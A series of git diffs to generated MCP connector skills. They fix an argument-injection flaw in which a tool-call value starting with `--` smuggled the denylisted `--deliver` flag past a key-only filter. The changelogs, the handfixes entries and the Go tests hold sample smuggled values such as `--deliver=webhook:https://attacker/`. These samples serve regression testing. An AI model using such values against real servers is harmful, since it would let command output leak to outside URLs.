+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -316,7 +328,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/connectwise-control/handfixes.json
+++ b/skills/connectwise-control/handfixes.json
@@ -290,6 +290,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/connectwise-manage/CHANGELOG.md
+++ b/skills/connectwise-manage/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.7] - 2026-09-01

--- a/skills/connectwise-manage/CHANGELOG.md
+++ b/skills/connectwise-manage/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.8]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.7] - 2026-09-01
 
 ### Fixed

--- a/skills/connectwise-manage/CHANGELOG.md
+++ b/skills/connectwise-manage/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.7] - 2026-09-01
 

--- a/skills/connectwise-manage/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/connectwise-manage/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/connectwise-manage/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/connectwise-manage/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/connectwise-manage/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/connectwise-manage/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/connectwise-manage/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/connectwise-manage/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/connectwise-manage/handfixes.json
+++ b/skills/connectwise-manage/handfixes.json
@@ -421,8 +421,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -432,7 +444,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/connectwise-manage/handfixes.json
+++ b/skills/connectwise-manage/handfixes.json
@@ -406,6 +406,35 @@
      "not_contains": "connectwise-manage-public-pp-cli"
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/cork/CHANGELOG.md
+++ b/skills/cork/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01
 

--- a/skills/cork/CHANGELOG.md
+++ b/skills/cork/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/cork/CHANGELOG.md
+++ b/skills/cork/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-09-01
 
 ### Fixed

--- a/skills/cork/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/cork/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/cork/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/cork/cli/internal/mcp/cobratree/shellout.go
@@ -345,6 +345,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -354,10 +361,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -365,11 +372,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/cork/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/cork/cli/internal/mcp/cobratree/shellout_test.go
@@ -89,7 +89,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"profile":  true,
 		"token":    true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -118,7 +118,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -174,7 +174,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"config":  "/tmp/evil.yaml",
 		"json":    "true",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -392,7 +392,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -831,4 +831,113 @@ func toolResultText(result *mcplib.CallToolResult) string {
 		return ""
 	}
 	return text.Text
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
+}
+
+// TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags is the end-to-end
+// half of mcp-argv-value-joined: the argv the child process actually
+// receives. The exploited shape was a doctor tool call whose json value
+// carried a denylisted --deliver.
+func TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags(t *testing.T) {
+	bin := writeArgvHelper(t)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"doctor"},
+		map[string]bool{"args": true, "deliver": true},
+		map[string]bool{"json": true},
+		nil,
+		true,
+		nil,
+	)
+
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"json": "--deliver=webhook:https://x/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"doctor", "--json=--deliver=webhook:https://x/"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+	for _, tok := range got {
+		if strings.HasPrefix(tok, "--deliver") {
+			t.Fatalf("a tool-call value reached the child as its own --deliver argv element: %#v", got)
+		}
+	}
 }

--- a/skills/cork/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/cork/cli/internal/mcp/cobratree/shellout_test.go
@@ -892,15 +892,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/cork/cli/internal/mcp/intents.go
+++ b/skills/cork/cli/internal/mcp/intents.go
@@ -49,6 +49,9 @@ func handleAnswerAnAdvisoryTheMomentACveIsNamed(ctx context.Context, req mcplib.
 	args = append(args, "vulnerabilities")
 	args = append(args, "exposure")
 	var missingSlug bool
+	if err := rejectFlagLikeRecipeValue("slug", input["slug"]); err != nil {
+		return mcplib.NewToolResultError(err.Error()), nil
+	}
 	args, missingSlug = appendRecipePositional(args, input["slug"], true)
 	if missingSlug {
 		return mcplib.NewToolResultError("slug is required"), nil
@@ -87,10 +90,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {
@@ -121,4 +124,17 @@ func recipeValueString(value any) string {
 		}
 		return fmt.Sprintf("%v", value)
 	}
+}
+
+// rejectFlagLikeRecipeValue is hand-wired (handfixes.json:
+// mcp-recipe-argv-not-flag-like). A recipe positional comes straight from the
+// tool call and lands in argv ahead of the recipe's own flags, so a value
